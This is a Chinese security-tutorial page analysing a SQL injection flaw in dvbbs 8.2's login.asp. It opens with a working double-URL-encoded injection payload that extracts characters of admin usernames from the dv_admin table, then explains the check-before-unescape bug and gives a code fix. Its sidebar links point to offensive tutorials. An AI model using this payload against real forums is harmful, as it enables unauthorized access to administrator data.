dvbbs 8.2 SQL Injection注射漏洞分析

所属分类: 实用技巧 / 安全教程 阅读数: 963
收藏 0 赞 0 分享
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271
就可触发.

漏洞分析:动网在asp领域也算一个比较元老的程序,这次在8.2新版里有一个低级的错误.漏洞代码在login.asp 118行左右

......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = unescape(username)
......
取得的username是先经过检查然后再unescape解码,导致用urlencode模式就可以饶过任何检查,和php的urldecode导致的注射很类似,譬如用%2527就可以提交'过去了.

修补方案:修补也很简单,将上述代码改成

......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = trim(Dvbbs.CheckStr(unescape(username)))
......
更多精彩内容其他人还在看

巧用端口映射 不通过网关开放任意内网(LCX.exe)

巧用端口映射 不通过网关开放任意内网(LCX.exe)
收藏 0 赞 0 分享

用手机控制服务器的方法解密

用手机控制服务器的方法解密
收藏 0 赞 0 分享

常用软件的静默安装方法介绍

大部分软件,其安装都具备一定的智能性,换句话说,许多软件的安装都能采取全自动或半自动的方式进行
收藏 0 赞 0 分享

新编MS07004网页木马源码代码

新编MS07004网页木马源码代码
收藏 0 赞 0 分享

XSS 0DAY代码

XSS 0DAY代码
收藏 0 赞 0 分享

expression&eval跨站的一个方法

expression&eval跨站的一个方法
收藏 0 赞 0 分享

phpMyAdmin 后台拿webshell

phpMyAdmin 后台拿webshell
收藏 0 赞 0 分享

想成为起码要懂的16个问题

想成为起码要懂的16个问题
收藏 0 赞 0 分享

利用WinRAR来捆绑木马2个技巧

利用WinRAR来捆绑木马2个技巧
收藏 0 赞 0 分享

内网渗透-----如何打开突破口

内网渗透-----如何打开突破口
收藏 0 赞 0 分享
查看更多